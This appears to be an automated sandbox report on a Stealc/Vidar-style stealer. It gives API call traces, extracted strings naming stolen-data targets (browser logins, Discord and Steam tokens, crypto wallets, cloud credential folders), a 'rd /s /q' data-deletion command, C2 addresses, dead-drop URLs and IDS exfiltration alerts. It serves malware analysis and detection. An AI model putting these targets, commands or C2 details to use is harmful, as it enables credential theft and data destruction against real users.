Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_00405FE7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,	3_2_0040E7E9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey,	3_2_00406062
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040627F LocalAlloc,BCryptDecrypt,	3_2_0040627F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,	3_2_0040609C

Source: dwpk5JGAxF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.130.190.206:443 -> 192.168.2.8:49708 version: TLS 1.2

Source: dwpk5JGAxF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: dwpk5JGAxF.exe, 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp, dwpk5JGAxF.exe, 00000000.00000002.1823913498.000000000A894000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: vdr1.pdb source: dwpk5JGAxF.exe, 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp, dwpk5JGAxF.exe, 00000000.00000002.1823913498.000000000A894000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: dwpk5JGAxF.exe, 00000000.00000003.1714504161.000000000A7DC000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: dwpk5JGAxF.exe, 00000000.00000003.1714504161.000000000A7DC000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: dwpk5JGAxF.exe, 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp, dwpk5JGAxF.exe, 00000000.00000002.1823913498.000000000A894000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00412A5D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,	3_2_00407891
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,	3_2_0040A69C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_00408776
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,	3_2_00413B10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00411BD2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,	3_2_004013DA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00406784
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	3_2_00411187
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_00409C78
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00408224
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00412539

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00411722

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.8:49710 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.8:49709 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49736 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49713 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49743 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49739 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49739 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49714 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49742 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49742 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49758 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.190.206:443 -> 192.168.2.8:49711
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49776 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49776 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.190.206:443 -> 192.168.2.8:49712
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49741 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49741 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49806 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49806 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49787 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49787 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49773 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49773 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49834 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49834 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49844 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49844 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49860 -> 94.130.190.206:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49887 -> 94.130.190.206:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199828130190

Source: global traffic

HTTP traffic detected: GET /g02f04 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 2.22.242.105 2.22.242.105
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.73.27
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.7
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.31
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.31
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.31
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.31
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.31
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

3_2_00403C79

Source: global traffic	HTTP traffic detected: GET /g02f04 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0Host: fua.4t.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCLnKzQEIitPNARjBy8wBGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.cbc392ebb3b4e3b9c755.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.3sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=D1ACD80E7D0E4D12A9FE9F71FBE6AE3D.RefC=2025-02-26T07:11:23Z; USRLOC=; MUID=2D46568907146C271CFD431606766D23; MUIDB=2D46568907146C271CFD431606766D23; _EDGE_S=F=1&SID=1396748ABA746BD70F236115BBA06AA5; _EDGE_V=1
